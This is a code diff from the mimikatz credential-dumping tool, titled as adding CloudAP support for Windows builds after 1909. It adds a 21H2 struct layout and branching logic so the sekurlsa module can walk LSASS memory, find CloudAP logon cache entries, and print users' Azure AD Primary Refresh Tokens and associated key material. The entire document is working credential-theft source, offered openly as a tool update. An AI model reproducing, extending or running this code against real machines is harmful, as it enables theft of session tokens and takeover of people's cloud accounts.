cloudap support for versions > 1909. sort of hacky

mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c

@@ -29,45 +29,89 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])
 
 void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
 {
-	KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
+
 	KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
 	KIWI_CLOUDAP_CACHE_UNK unk;
-	KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
+	KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem};
 	KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
 
 	if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
 	{
 		aLsassMemory.address = CloudApGlobalLogonSessionList;
-		if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
+		if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
 		{
-			if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
+			KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon;
+			KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
+			if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId))
 			{
-				if(logon.cacheEntry)
+				if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2)))
 				{
-					aLocalMemory.address = &cache;
-					aLsassMemory.address = logon.cacheEntry;
-					if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
+					if(logon.cacheEntry)
 					{
-						kprintf(L"\n\t     Cachedir : %s", cache.toname);
-						if(cache.cbPRT && cache.PRT)
+						aLocalMemory.address = &cache;
+						aLsassMemory.address = logon.cacheEntry;
+						if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
 						{
-							creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
-							creds.UserName.Buffer = (PWSTR) cache.PRT;
-						}
+							kprintf(L"\n\t     Cachedir : %s", cache.toname);
+							if(cache.cbPRT && cache.PRT)
+							{
+								creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
+								creds.UserName.Buffer = (PWSTR) cache.PRT;
+							}
 
-						if(cache.toDetermine)
+							if(cache.toDetermine)
+							{
+								aLocalMemory.address = &unk;
+								aLsassMemory.address = cache.toDetermine;
+								if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
+								{
+									kprintf(L"\n\t     Key GUID : ");
+									kull_m_string_displayGUID(&unk.guid);
+									creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
+									creds.Password.Buffer = (PWSTR) unk.unk;
+								}
+							}
+							kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
+						}
+					}
+				}
+			}
+		}
+		else
+		{
+			KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
+			KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
+			if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
+			{
+				if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
+				{
+					if(logon.cacheEntry)
+					{
+						aLocalMemory.address = &cache;
+						aLsassMemory.address = logon.cacheEntry;
+						if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
 						{
-							aLocalMemory.address = &unk;
-							aLsassMemory.address = cache.toDetermine;
-							if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
+							kprintf(L"\n\t     Cachedir : %s", cache.toname);
+							if(cache.cbPRT && cache.PRT)
+							{
+								creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
+								creds.UserName.Buffer = (PWSTR) cache.PRT;
+							}
+
+							if(cache.toDetermine)
 							{
-								kprintf(L"\n\t     Key GUID : ");
-								kull_m_string_displayGUID(&unk.guid);
-								creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
-								creds.Password.Buffer = (PWSTR) unk.unk;
+								aLocalMemory.address = &unk;
+								aLsassMemory.address = cache.toDetermine;
+								if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
+								{
+									kprintf(L"\n\t     Key GUID : ");
+									kull_m_string_displayGUID(&unk.guid);
+									creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
+									creds.Password.Buffer = (PWSTR) unk.unk;
+								}
 							}
+							kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
 						}
-						kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
 					}
 				}
 			}

mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h

@@ -90,4 +90,18 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
 	DWORD unk6;
 	PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
 	// ...
-} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
+
+typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
+	struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink;
+	struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink;
+	DWORD unk0;
+	DWORD unk1;
+	DWORD unk2;
+	LUID	LocallyUniqueIdentifier;
+	DWORD unk3;
+	DWORD64 unk4;
+	DWORD64 unk5;
+	PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
+	// ...
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2;